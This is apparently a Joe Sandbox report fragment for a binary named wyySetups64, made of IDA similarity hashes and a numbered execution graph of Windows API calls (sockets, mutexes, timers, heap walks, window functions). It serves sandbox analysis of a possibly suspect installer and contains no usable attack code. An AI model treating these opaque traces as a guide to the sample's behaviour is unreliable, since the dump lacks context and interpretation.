                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction ID: 1ae5ea426948afbf23a40f8be825a07eda7adc536c4536595022c52af38eca2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87012839801305CEEF39EF66CCC46ADB7FAAF04221F58486FE0999A260DB309581CE41
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032100A2
                                                                                                                                                                                                                • Part of subcall function 0320381A: __getptd_noexit.LIBCMT ref: 0320381D
                                                                                                                                                                                                                • Part of subcall function 0320381A: __amsg_exit.LIBCMT ref: 0320382A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032100B0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction ID: 16305e55ab82e18a4ac771d370ee930814512271c2e06b862b64aabdc2e6e692
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1501D6388203039ECF74DF24D640A6DB7F8AF20611F28C45ED4C1BA191CB7895E5CB40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B337AF
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __getptd_noexit.LIBCMT ref: 00B298E9
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __amsg_exit.LIBCMT ref: 00B298F6
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B337BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:6.9%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:2.5%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:140
146051->146052 146053 6bf31d12 146051->146053 146052->146051 146054 6bf31f26 146053->146054 146097 6bf31d5d htons 146054->146097 146056 6bf31f51 146098 6bf31d7c _memcpy_s 146097->146098 146098->146056 146124 6cd3d558 146125 6cd3d563 146124->146125 146126 6cd3d562 146124->146126 146127 6cd3d573 FindNextFileW 146125->146127 146128 6cd3d56f 146125->146128 146129 b9f4b2 146130 b9f4be _setlocale 146129->146130 146131 b9f4f6 146130->146131 146132 b9f4d6 146130->146132 146139 b9f4eb _setlocale 146130->146139 146142 bad28b 146131->146142 146157 b998d1 67 API calls __getptd_noexit 146132->146157 146135 b9f4db 146158 b9a5b1 6 API calls 2 library calls 146135->146158 146143 bad2bf EnterCriticalSection 146142->146143 146144 bad29d 146142->146144 146146 b9f4fe 146143->146146 146144->146143 146145 bad2a5 146144->146145 146160 ba339f 146145->146160 146148 b9f350 146146->146148 146149 b9f383 146148->146149 146152 b9f362 146148->146152 146159 b9f52a LeaveCriticalSection LeaveCriticalSection _vprintf_helper 146149->146159 146150 b9f36e 146175 b998d1 67 API calls __getptd_noexit 146150->146175 146152->146149 146152->146150 146155 b9f3a1 _setlocale 146152->146155 146153 b9f373 146176 b9a5b1 6 API calls 2 library calls 146153->146176 146155->146149 146169 bb158a 146155->146169 146157->146135 146159->146139 146161 ba33c7 EnterCriticalSection 146160->146161 146162 ba33b4 146160->146162 146161->146146 146167 ba32dc 67 API calls 8 library calls 146162->146167 146164 ba33ba 146164->146161 146168 b97051 67 API calls 3 library calls 146164->146168 146166 ba33c6 146166->146161 146167->146164 146168->146166 146170 bb1599 146169->146170 146171 bb15ae 146169->146171 146177 b998d1 67 API calls __getptd_noexit 146170->146177 146171->146155 146173 bb159e 146178 b9a5b1 6 API calls 2 library calls 146173->146178 146175->146153 146177->146173 146179 6bf2ff7e 146180 6bf300c9 146179->146180 146181 6bf2ffa8 GetWindowLongW 146179->146181 146183 6bf3018f 146180->146183 146187 6bf300d4 146180->146187 146182 
6bf2ffb5 DefWindowProcW 146181->146182 146191 6bf2ffbf 146181->146191 146190 6bf2ffc6 ctype 146182->146190 146183->146182 146185 6bf3019a GetWindowLongW 146183->146185 146185->146182 146197 6bf301b3 _memset 146185->146197 146186 6bf384d6 _strlwr_s_l_stat 5 API calls 146188 6bf3029d 146186->146188 146187->146190 146210 6bf30dc4 WSAGetLastError WSASetLastError 146187->146210 146190->146186 146191->146190 146192 6bf30086 146191->146192 146193 6bf30006 146191->146193 146202 6bf300a7 146192->146202 146208 6bf2fec7 ioctlsocket 146192->146208 146193->146190 146207 6bf2fec7 ioctlsocket 146193->146207 146196 6bf3005f 146196->146190 146200 6bf30063 WSAGetLastError 146196->146200 146197->146190 146201 6bf30226 htons 146197->146201 146198 6bf3009b 146198->146202 146203 6bf3009f WSAGetLastError 146198->146203 146200->146190 146204 6bf30247 moneypunct 146201->146204 146202->146190 146209 6bf30dc4 WSAGetLastError WSASetLastError 146202->146209 146203->146202 146204->146190 146205 6bf30262 GetLastError 146204->146205 146205->146190 146206 6bf30275 GetLastError 146205->146206 146206->146190 146207->146196 146208->146198 146209->146190 146210->146190 146211 b85637 146225 b95454 146211->146225 146213 b85643 GetDC 146226 b8548f 146213->146226 146216 b8566e 146218 b85697 146216->146218 146231 b1c8e0 146216->146231 146217 b8565e EnumFontFamiliesW 146217->146216 146220 b1c8e0 std::_String_base::_Xlen 69 API calls 146218->146220 146222 b856aa 146218->146222 146220->146222 146221 b856bd ReleaseDC CreateFontW 146224 b856ed std::locale::_Init 146221->146224 146222->146221 146223 b1c8e0 std::_String_base::_Xlen 69 API calls 146222->146223 146223->146221 146225->146213 146238 b94550 146226->146238 146228 b854ba GetVersionExW 146229 b94647 __except1 5 API calls 146228->146229 146230 b854e2 146229->146230 146230->146216 146230->146217 146232 b1c8f6 146231->146232 146233 b1c8e9 146231->146233 146241 b1cc80 69 API calls 3 library calls 146232->146241 146240 b1cc80 69 API calls 3 library calls 
146233->146240 146235 b1c8f2 146235->146218 146237 b1c917 146237->146218 146239 b9455c __VEC_memzero 146238->146239 146239->146228 146240->146235 146241->146237 146242 b62322 146245 b62167 146242->146245 146244 b62346 146246 b62179 146245->146246 146259 b6219a 146245->146259 146247 b621b6 146246->146247 146248 b62181 146246->146248 146249 b621dc 146247->146249 146250 b621bd 146247->146250 146275 b620a9 146248->146275 146251 b621e3 146249->146251 146252 b621f1 146249->146252 146310 b61458 IsWindow IsWindowVisible PostMessageW InvalidateRect 146250->146310 146301 b61513 IsWindow 146251->146301 146254 b62217 146252->146254 146255 b621f8 146252->146255 146257 b62240 146254->146257 146258 b6221e 146254->146258 146305 b614af IsWindow 146255->146305 146262 b62247 146257->146262 146263 b62269 146257->146263 146311 b6156b InvalidateRect 146258->146311 146259->146244 146260 b621da 146260->146259 146312 b61304 _TrackMouseEvent 146262->146312 146265 b62270 146263->146265 146269 b62292 146263->146269 146313 b6158c InvalidateRect 146265->146313 146271 b622dc 146269->146271 146314 b615b4 IsWindowEnabled LoadCursorW SetCursor 146269->146314 146273 b622f9 146271->146273 146315 b61894 InvalidateRect 146271->146315 146273->146259 146316 b618a4 InvalidateRect 146273->146316 146276 b620b8 __EH_prolog3_GS 146275->146276 146317 b47451 146276->146317 146280 b620f8 146323 b56537 GetWindowRect 146280->146323 146302 b61554 InvalidateRect 146301->146302 146303 b61535 PostMessageW 146301->146303 146304 b61568 146302->146304 146303->146302 146304->146259 146306 b614cd IsWindowEnabled 146305->146306 146307 b614f9 InvalidateRect 146305->146307 146306->146307 146308 b614da PostMessageW 146306->146308 146309 b6150f 146307->146309 146308->146307 146309->146259 146310->146260 146311->146259 146312->146259 146313->146259 146314->146269 146315->146273 146316->146259 146318 b47474 GetClientRect 146317->146318 146319 b47469 BeginPaint 146317->146319 146320 b47323 CreateCompatibleDC 146318->146320 
146319->146318 146371 b46393 CreateCompatibleBitmap 146320->146371 146322 b4736a SelectObject SetViewportOrgEx 146322->146280 146324 b56560 146323->146324 146371->146322 146438 b363aa 146439 b363b6 __EH_prolog3_catch 146438->146439 146442 b35ab7 146439->146442 146579 b94d50 146442->146579 146445 b35b22 146446 b35b3a GetCurrentDirectoryW 146445->146446 146447 b35b63 _wcscat _wcscpy 146446->146447 146581 b34494 8 API calls 3 library calls 146447->146581 146449 b35bdd 146582 b348f2 GetCurrentThreadId RaiseException __EH_prolog3 std::locale::_Init 146449->146582 146451 b35bec 146583 b34c96 GetCurrentThreadId RaiseException __EH_prolog3 std::locale::_Init 146451->146583 146453 b35bfb 146584 b34d5b GetCurrentThreadId RaiseException __EH_prolog3 std::locale::_Init 146453->146584 146580 b35ac9 GetWindowsDirectoryW 146579->146580 146580->146445 146581->146449 146582->146451 146583->146453 146639 b33ca8 146642 b98c13 146639->146642 146641 b33cc3 146643 b98c1f _setlocale 146642->146643 146644 b98c42 146643->146644 146645 b98c27 146643->146645 146647 b98c50 146644->146647 146650 b98c91 146644->146650 146741 b998e4 67 API calls __getptd_noexit 146645->146741 146743 b998e4 67 API calls __getptd_noexit 146647->146743 146648 b98c2c 146742 b998d1 67 API calls __getptd_noexit 146648->146742 146653 b98c9e 146650->146653 146654 b98cb2 146650->146654 146652 b98c55 146744 b998d1 67 API calls __getptd_noexit 146652->146744 146746 b998e4 67 API calls __getptd_noexit 146653->146746 146662 b98cdb 146654->146662 146663 b98cc5 146654->146663 146655 b98c34 _setlocale 146655->146641 146657 b98c5c 146745 b9a5b1 6 API calls 2 library calls 146657->146745 146659 b98ca3 146747 b998d1 67 API calls __getptd_noexit 146659->146747 146748 b998d1 67 API calls __getptd_noexit 146662->146748 146670 b98651 146663->146670 146666 b98ce0 146749 b998e4 67 API calls __getptd_noexit 146666->146749 146668 b98cd3 146750 b98d06 LeaveCriticalSection __unlock_fhandle 146668->146750 146671 b98688 146670->146671 146672 
b9866d 146670->146672 146673 b98697 146671->146673 146675 b986be 146671->146675 146751 b998e4 67 API calls __getptd_noexit 146672->146751 146753 b998e4 67 API calls __getptd_noexit 146673->146753 146680 b986dd 146675->146680 146692 b986f1 146675->146692 146677 b98672 146752 b998d1 67 API calls __getptd_noexit 146677->146752 146679 b9869c 146754 b998d1 67 API calls __getptd_noexit 146679->146754 146756 b998e4 67 API calls __getptd_noexit 146680->146756 146681 b9867a 146681->146668 146682 b98749 146758 b998e4 67 API calls __getptd_noexit 146682->146758 146685 b986a3 146687 b986e2 146757 b998d1 67 API calls __getptd_noexit 146687->146757 146689 b9874e 146692->146681 146692->146682 146694 b98725 146692->146694 146696 b9876a 146692->146696 146694->146682 146698 b98730 ReadFile 146694->146698 146761 ba0596 67 API calls _malloc 146696->146761 146702 b9885c 146698->146702 146703 b98bd7 GetLastError 146698->146703 146701 b98780 146702->146703 146741->146648 146742->146655 146743->146652 146744->146657 146746->146659 146747->146657 146748->146666 146749->146668 146750->146655 146751->146677 146752->146681 146753->146679 146754->146685 146756->146687 146758->146689 146761->146701 146788 b6a5ad 146803 b95421 146788->146803 146790 b6a5b9 GetParent ShowWindow 146804 b6a3b3 GetClientRect 146790->146804 146803->146790 146818 b69cbe 146804->146818 146819 b69ccf 146818->146819 146824 b3ee0d 146819->146824 146836 b3e84d 146824->146836 146827 b656bd 146860 b277af 146827->146860 146830 b656d3 SetLastError 146831 b656df 146837 b3e85f 146836->146837 146838 b3e8dd 146836->146838 146837->146838 146839 b3e87c EnterCriticalSection 146837->146839 146838->146827 146840 b3e897 146839->146840 146854 b3e971 146839->146854 146841 b3e905 LoadCursorW 146840->146841 146842 b3e89e GetClassInfoExW 146840->146842 146845 b3e8e4 146841->146845 146844 b3e8c3 GetClassInfoExW 146842->146844 146842->146845 146843 b283c2 LeaveCriticalSection 146843->146838 146844->146845 146847 b3e8d5 146844->146847 146848 
b3e943 GetClassInfoExW 146845->146848 146858 b3d630 67 API calls swprintf 146845->146858 146855 b283c2 146847->146855 146851 b3e968 146848->146851 146848->146854 146852 b3e93d 146852->146848 146854->146843 146858->146852 146861 b277c2 146860->146861 146862 b277b7 146860->146862 146874 b27774 GetCurrentProcess FlushInstructionCache 146861->146874 146873 b8fcad 16 API calls 146862->146873 146865 b277bc 146865->146861 146866 b277d1 146865->146866 146866->146830 146866->146831 146873->146865 146874->146866 146904 b61e2d 146905 b61e39 __EH_prolog3 146904->146905 146906 b1ba90 std::_String_base::_Xlen 2 API calls 146905->146906 146907 b61e48 146906->146907 146908 b1cf00 std::_String_base::_Xlen 69 API calls 146907->146908 146909 b61e57 GetWindowTextW 146908->146909 146910 b2d354 2 API calls 146909->146910 146911 b61e6d GetDC GetWindowRect 146910->146911 146912 b61eb1 146911->146912 146913 b61ef2 SetWindowPos 146912->146913 146914 b61f0d std::locale::_Init ctype 146913->146914 146915 6cd3f84d 146918 6cd7ae0a 146915->146918 146917 6cd3f855 146919 6cd7ae16 __EH_prolog3 146918->146919 146928 6cdddf34 146919->146928 146921 6cd7ae41 146922 6cdddf34 ctype 18 API calls 146921->146922 146924 6cd7ae68 146922->146924 146923 6cdddf34 ctype 18 API calls 146925 6cd7ae8f 146923->146925 146924->146923 146926 6cdddf34 ctype 18 API calls 146925->146926 146927 6cd7aeb6 numpunct 146926->146927 146927->146917 146930 6cdddf3e 146928->146930 146929 6cddd47e _malloc 3 API calls 146929->146930 146930->146929 146931 6cdddf58 146930->146931 146932 6cdddf5a 146930->146932 146931->146921 146933 6cdddf68 std::bad_alloc::bad_alloc 146932->146933 146935 6cdddf80 146932->146935 146937 6cdde46f 13 API calls ctype 146933->146937 146936 6cdddf8a __CxxThrowException 146935->146936 146937->146935 146938 6cd5c24a 146939 6cd5c257 146938->146939 146940 6cd5c25c GetCurrentThreadId 146938->146940 146940->146939 146941 6cd5c26b 146940->146941 146941->146939 146943 6cd5bd5f 146941->146943 146944 6cd5bd70 
146943->146944 146947 6cd34d0b 146944->146947 146948 6cd34d1d 146947->146948 146949 6cd34d21 SetLastError 146948->146949 146951 6cd34d2d 146948->146951 146950 6cd34d29 146949->146950 146950->146939 146951->146950 146952 6cd34d64 CreateWindowExW 146951->146952 146952->146950 146953 b19990 GetCurrentProcessId 146978 b195f0 146953->146978 146956 b19acf 146960 b94647 __except1 5 API calls 146956->146960 146957 b19a1f GetLastError 146958 b19a35 146957->146958 146959 b19a2c WaitForSingleObject 146957->146959 146982 b19740 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 146958->146982 146959->146958 146962 b19aef 146960->146962 146963 b19a41 146964 b19a45 146963->146964 146965 b19a4c 146963->146965 146967 b19ab0 ReleaseMutex 146964->146967 146983 b19fa0 GetProcessHeap HeapAlloc 146965->146983 146967->146956 146968 b19ac8 CloseHandle 146967->146968 146968->146956 146969 b19a51 146970 b19a62 146969->146970 146984 b19de0 TlsAlloc RaiseException _memset __CxxThrowException@8 146969->146984 146972 b19a84 146970->146972 146985 b94656 RaiseException 146970->146985 146986 b19830 GetProcessHeap HeapAlloc 146972->146986 146979 b195f6 146978->146979 146980 b1961f CreateMutexW 146979->146980 146988 b97908 77 API calls __vsnwprintf_l 146979->146988 146980->146956 146980->146957 146982->146963 146983->146969 146984->146970 146985->146972 146988->146980 146989 6bf04d51 146994 6bf04d5e _memset __write_nolock 146989->146994 146990 6bf384d6 _strlwr_s_l_stat 5 API calls 146991 6bf04df8 146990->146991 146992 6bf04dbf 146993 6bf04dd4 ctype 146992->146993 146995 6bf03ac3 193 API calls 146992->146995 146993->146990 146994->146992 146994->146993 146996 6bf02447 108 API calls 146994->146996 146995->146993 146997 6bf04db1 146996->146997 146999 6bf03ac3 146997->146999 147000 6bf03ae7 __EH_prolog3 146999->147000 147037 6bf1bfae 147000->147037 147038 6bf1bfba __EH_prolog3 ctype 147037->147038 147127 6bee765f GetTickCount 147038->147127 147040 6bf1c050 147128 6bee765f GetTickCount 147040->147128 
147042 6bf1c05b 147129 6bee765f GetTickCount 147042->147129 147044 6bf1c066 147130 6bee765f GetTickCount 147044->147130 147127->147040 147128->147042 147129->147044 147392 6bf330d6 147393 6bf330e8 _memset __write_nolock 147392->147393 147397 6bf33135 147393->147397 147398 6bf2fcc6 147393->147398 147394 6bf384d6 _strlwr_s_l_stat 5 API calls 147395 6bf33163 147394->147395 147397->147394 147399 6bf2fce2 recvfrom 147398->147399 147400 6bf2fccf 147398->147400 147399->147400 147400->147397 147401 b8531f 147404 b9ea8c 147401->147404 147405 b9eabc 147404->147405 147406 b9eaa0 147404->147406 147425 ba4c42 TlsGetValue 147405->147425 147460 b998d1 67 API calls __getptd_noexit 147406->147460 147409 b9eaa5 147461 b9a5b1 6 API calls 2 library calls 147409->147461 147413 b8533f 147415 b9eb20 147416 b949fc _realloc 67 API calls 147415->147416 147418 b9eb26 147416->147418 147418->147413 147462 b998f7 67 API calls 3 library calls 147418->147462 147426 b9eac2 147425->147426 147427 ba4c57 147425->147427 147430 ba05db 147426->147430 147463 ba4ba7 6 API calls __crt_waiting_on_module_handle 147427->147463 147429 ba4c62 TlsSetValue 147429->147426 147432 ba05e4 147430->147432 147433 b9eace 147432->147433 147434 ba0602 Sleep 147432->147434 147464 bb13b0 147432->147464 147433->147415 147436 ba4e30 147433->147436 147435 ba0617 147434->147435 147435->147432 147435->147433 147482 ba4db7 GetLastError 147436->147482 147438 ba4e38 147439 b9eadb 147438->147439 147497 b97051 67 API calls 3 library calls 147438->147497 147460->147409 147462->147413 147463->147429 147465 bb13bc _setlocale 147464->147465 147466 bb13d4 147465->147466 147470 bb13f3 _memset 147465->147470 147477 b998d1 67 API calls __getptd_noexit 147466->147477 147468 bb13d9 147478 b9a5b1 6 API calls 2 library calls 147468->147478 147469 bb1465 RtlAllocateHeap 147469->147470 147470->147469 147473 ba339f __lock 66 API calls 147470->147473 147474 bb13e9 _setlocale 147470->147474 147479 ba410c 5 API calls 2 library calls 147470->147479 
147480 bb14ac LeaveCriticalSection _doexit 147470->147480 147481 ba5437 6 API calls __decode_pointer 147470->147481 147473->147470 147474->147432 147477->147468 147479->147470 147480->147470 147481->147470 147483 ba4c42 ___set_flsgetvalue 8 API calls 147482->147483 147484 ba4dce 147483->147484 147485 ba4e24 SetLastError 147484->147485 147486 ba05db __calloc_crt 64 API calls 147484->147486 147485->147438 147487 ba4de2 147486->147487 147487->147485 147488 ba4dea 147487->147488 147497->147439 147556 6bf3dadb 147557 6bf3dae6 147556->147557 147558 6bf3daeb 147556->147558 147570 6bf484e1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 147557->147570 147562 6bf3d9e5 147558->147562 147561 6bf3daf9 147563 6bf3d9f1 _raise 147562->147563 147565 6bf3da8e _raise 147563->147565 147568 6bf3da3e ___DllMainCRTStartup 147563->147568 147571 6bf3d8b0 147563->147571 147565->147561 147566 6bf3da6e 147566->147565 147567 6bf3d8b0 __CRT_INIT@12 156 API calls 147566->147567 147567->147565 147568->147565 147568->147566 147569 6bf3d8b0 __CRT_INIT@12 156 API calls 147568->147569 147569->147566 147570->147558 147572 6bf3d93b 147571->147572 147573 6bf3d8bf 147571->147573 147574 6bf3d972 147572->147574 147576 6bf3d941 147572->147576 147618 6bf4041e HeapCreate 147573->147618 147577 6bf3d9d0 147574->147577 147578 6bf3d977 147574->147578 147580 6bf3d95c 147576->147580 147588 6bf3d8ca 147576->147588 147732 6bf40778 67 API calls _doexit 147576->147732 147577->147588 147737 6bf3f2ce 79 API calls 2 library calls 147577->147737 147581 6bf3ef97 ___set_flsgetvalue 8 API calls 147578->147581 147580->147588 147733 6bf47fdd 68 API calls __read_nolock 147580->147733 147585 6bf3d97c 147581->147585 147589 6bf42ec2 __calloc_crt 67 API calls 147585->147589 147586 6bf3d8d6 __RTC_Initialize 147588->147568 147590 6bf3d988 147589->147590 147590->147588 147595 6bf3eefc __decode_pointer 6 API calls 147590->147595 147592 6bf3d966 147734 6bf3efe8 70 API calls 2 library 
calls 147592->147734 147598 6bf3d9a6 147595->147598 147597 6bf3d96b 147735 6bf4044e VirtualFree HeapFree HeapFree HeapDestroy 147597->147735 147619 6bf3d8c5 147618->147619 147619->147588 147620 6bf3f33c GetModuleHandleW 147619->147620 147621 6bf3f350 147620->147621 147622 6bf3f357 147620->147622 147738 6bf404c2 Sleep GetModuleHandleW 147621->147738 147624 6bf3f361 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 147622->147624 147625 6bf3f4bf 147622->147625 147627 6bf3f3aa TlsAlloc 147624->147627 147741 6bf3efe8 70 API calls 2 library calls 147625->147741 147626 6bf3f356 147626->147622 147630 6bf3f4c4 147627->147630 147631 6bf3f3f8 TlsSetValue 147627->147631 147630->147586 147631->147630 147632 6bf3f409 147631->147632 147732->147580 147733->147592 147734->147597 147735->147588 147737->147588 147738->147626 147741->147630 147766 6bf305da 147769 6bf30345 147766->147769 147770 6bf3034f 147769->147770 147771 6bf303a2 closesocket 147770->147771 147772 6bf3036e ctype 147770->147772 147773 6bf303a9 moneypunct ctype 147770->147773 147771->147773 147776 6bf30380 WSAAsyncSelect shutdown 147772->147776 147774 6bf303d7 WSACancelAsyncRequest 147773->147774 147775 6bf303de 147773->147775 147774->147775 147779 6bf2c70a 76 API calls ctype 147776->147779 147778 6bf303a0 147778->147773 147779->147778 147780 b4869e 147785 b486c2 _memset __EH_prolog3 147780->147785 147781 b48753 IsDialogMessageW 147782 b48738 ctype 147781->147782 147783 b94647 __except1 5 API calls 147782->147783 147784 b48778 147783->147784 147785->147781 147785->147782 147786 b486fd GetClassNameW 147785->147786 147787 b1b680 78 API calls 147786->147787 147788 b4871d 147787->147788 147789 b48734 ctype 147788->147789 147791 b27fa1 81 API calls 2 library calls 147788->147791 147789->147781 147789->147782 147791->147789 147792 b48119 147794 b4812e 147792->147794 147793 b48136 147794->147793 147795 b48150 GetClientRect 147794->147795 147796 b4817f 147794->147796 147795->147796 147809 b47cd1 147796->147809 
147799 b47cd1 6 API calls 147800 b481aa 147799->147800 147813 b4687c 147800->147813 147804 b481b6 147805 b4687c 6 API calls 147804->147805 147806 b4820e 147804->147806 147807 b481df ShowWindow 147804->147807 147817 b46850 147804->147817 147828 b468c4 6 API calls ctype 147804->147828 147805->147804 147806->147793 147823 b465ca 147806->147823 147807->147804 147811 b47ce5 147809->147811 147812 b47cf4 147811->147812 147829 b9a5d7 6 API calls __vswprintf_s_l 147811->147829 147812->147799 147814 b4688a 147813->147814 147816 b46893 147814->147816 147830 b9a5d7 6 API calls __vswprintf_s_l 147814->147830 147816->147804 147818 b4685e 147817->147818 147819 b46859 147817->147819 147821 b46877 147818->147821 147832 b9a5d7 6 API calls __vswprintf_s_l 147818->147832 147831 b9a5d7 6 API calls __vswprintf_s_l 147819->147831 147821->147804 147824 b46625 147823->147824 147825 b465de GetClientRect InvalidateRect 147823->147825 147824->147793 147828->147804 147829->147812 147830->147816 147831->147818 147832->147821 147846 b1e300 147849 b1e230 147846->147849 147848 b1e32e 147850 b1e240 _memset 147849->147850 147859 b12770 CreateFileW 147850->147859 147852 b1e2ab 147853 b1e2e1 147852->147853 147855 b1e2bf 147852->147855 147854 b94647 __except1 5 API calls 147853->147854 147856 b1e2f2 147854->147856 147857 b94647 __except1 5 API calls 147855->147857 147856->147848 147858 b1e2dd 147857->147858 147858->147848 147860 b12791 147859->147860 147861 b127b5 147859->147861 147914 b18150 92 API calls 147860->147914 147868 b12860 147861->147868 147864 b127c5 147865 b127ae 147865->147852 147869 b128b8 _memset 147868->147869 147872 b128f1 147869->147872 147940 b95674 147869->147940 147898 b1299d 147872->147898 147915 b15690 147872->147915 147873 b129c3 SetLastError 147874 b129cb 147873->147874 147874->147872 147876 b129d7 147874->147876 147958 b18150 92 API calls 147876->147958 147877 b12b4a 147878 b94647 __except1 5 API calls 147877->147878 147883 b12b60 147878->147883 147881 b949fc _realloc 67 API 
calls 147884 b12b39 147881->147884 147882 b949fc _realloc 67 API calls 147882->147877 147883->147864 147884->147877 147884->147882 147898->147881 147898->147884 147914->147865 147916 b95674 _malloc 67 API calls 147915->147916 147917 b156a1 147916->147917 147918 b156d2 147917->147918 147919 b156ac SetLastError 147917->147919 147966 b14680 147918->147966 148029 b18150 92 API calls 147919->148029 147923 b156c5 147941 b95727 147940->147941 147951 b95686 147940->147951 148117 ba5437 6 API calls __decode_pointer 147941->148117 147943 b9572d 148118 b998d1 67 API calls __getptd_noexit 147943->148118 147948 b956e3 RtlAllocateHeap 147948->147951 147949 b95697 147949->147951 148110 ba5630 67 API calls 2 library calls 147949->148110 148111 ba545f 67 API calls 7 library calls 147949->148111 148112 b970a5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 147949->148112 147951->147948 147951->147949 147952 b95713 147951->147952 147955 b95718 147951->147955 147957 b129ba 147951->147957 148113 b955ab 67 API calls 4 library calls 147951->148113 148114 ba5437 6 API calls __decode_pointer 147951->148114 148115 b998d1 67 API calls __getptd_noexit 147952->148115 148116 b998d1 67 API calls __getptd_noexit 147955->148116 147957->147873 147957->147874 147958->147898 147967 b94550 _memset 147966->147967 148029->147923 148110->147949 148111->147949 148113->147951 148114->147951 148115->147955 148116->147957 148117->147943 148118->147957 148119 6cd26ee0 GetCurrentProcessId 148141 6cd26c60 148119->148141 148122 6cd2703a 148123 6cd26f6e GetLastError 148124 6cd26f84 148123->148124 148125 6cd26f7b WaitForSingleObject 148123->148125 148145 6cd26cd0 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 148124->148145 148125->148124 148127 6cd26f8c 148128 6cd26f90 148127->148128 148129 6cd26f9a GetProcessHeap 148127->148129 148130 6cd2701b ReleaseMutex 148128->148130 148131 6cd26fa6 HeapAlloc 148129->148131 148132 6cd26fb5 148129->148132 148130->148122 148133 6cd27033 CloseHandle 
148130->148133 148131->148132 148134 6cd26fd7 __CxxThrowException 148132->148134 148135 6cd26fec 148132->148135 148136 6cd26fc7 148132->148136 148133->148122 148134->148135 148146 6cd26da0 GetProcessHeap HeapAlloc 148135->148146 148136->148132 148138 6cd26ffa 148139 6cd27001 __CxxThrowException 148138->148139 148140 6cd27016 148138->148140 148139->148140 148140->148130 148142 6cd26c66 148141->148142 148143 6cd26c77 _vswprintf_s 148142->148143 148144 6cd26c96 CreateMutexW 148142->148144 148143->148144 148144->148122 148144->148123 148145->148127 148146->148138 148147 6cd9a86a 148148 6cd9a876 __EH_prolog3 148147->148148 148161 6cdaa916 lstrlenW __EH_prolog3 numpunct 148148->148161 148150 6cd9a966 148162 6cdaa916 lstrlenW __EH_prolog3 numpunct 148150->148162 148152 6cd9a9b3 148163 6cdaa916 lstrlenW __EH_prolog3 numpunct 148152->148163 148154 6cd9aa28 148164 6cd2ac1f lstrlenW 148154->148164 148156 6cd9aa35 148165 6cdaa916 lstrlenW __EH_prolog3 numpunct 148156->148165 148158 6cd9aa73 148166 6cdaa916 lstrlenW __EH_prolog3 numpunct 148158->148166 148160 6cd9aac1 numpunct 148161->148150 148162->148152 148163->148154 148164->148156 148165->148158 148166->148160 148167 6bf11f45 148178 6bf0e53f 148167->148178 148169 6bf11f58 148170 6bf11f61 GetTickCount GetTickCount 148169->148170 148175 6bf11f5d 148169->148175 148171 6bf11fa0 148170->148171 148177 6bf11fb7 148170->148177 148180 6bf0e54b __EH_prolog3_catch ctype 148178->148180 148181 6bf0e5ed CreateWaitableTimerW 148180->148181 148211 6bf3848a RaiseException 148180->148211 148182 6bf0e600 GetLastError 148181->148182 148183 6bf0e616 SetWaitableTimer 148181->148183 148182->148180 148184 6bf0e632 GetLastError 148183->148184 148185 6bf0e648 CreateMutexW 148183->148185 148184->148180 148186 6bf0e658 GetLastError 148185->148186 148187 6bf0e66e CreateSemaphoreW 148185->148187 148186->148180 148188 6bf0e685 GetLastError 148187->148188 148189 6bf0e69b CreateSemaphoreW 148187->148189 148188->148189 148190 6bf0e6c0 CreateEventW 
